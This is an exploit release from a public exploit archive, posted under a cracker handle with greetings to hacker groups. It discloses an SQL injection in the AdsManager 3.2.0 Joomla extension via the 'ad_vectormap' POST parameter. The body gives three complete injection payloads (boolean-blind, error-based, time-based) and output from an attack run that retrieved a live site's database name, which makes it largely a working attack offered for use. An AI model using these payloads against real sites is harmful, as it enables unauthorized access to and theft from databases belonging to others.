Advertisement
C r a C k E r
T H E C R A C K O F E T E R N A L M I G H T
From The Ashes and Dust Rises An Unimaginable crack....
[ Exploits ]
: Author : CraCkEr :
Website : extensions.joomla.org
Vendor : JULOA
Software : AdsManager 3.2.0 Extension for Joomla
Vuln Type: SQL Injection
Method : POST
Impact : Database Access
B4nks-NET irc.b4nks.tk #unix
: :
Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to
system compromise
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
CraCkEr 2022
POST parameter 'ad_vectormap' is vulnerable
---
Parameter: ad_vectormap (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') RLIKE (SELECT (CASE WHEN (8892=8892) THEN '' ELSE 0x28 END))-- TnXM&advsearch=0&new_search=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 2373 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2373=2373,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- lAQM&advsearch=0&new_search=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 4095 FROM (SELECT(SLEEP(5)))TLzG)-- UmxX&advsearch=0&new_search=1
---
[+] Starting the Attack
[INFO] fetching current database
the back-end DBMS is MySQL
web application technology: PHP 7.4.30, Nginx
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
current database: 'c1demosource'
[-] Done
Copyright ©2023 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.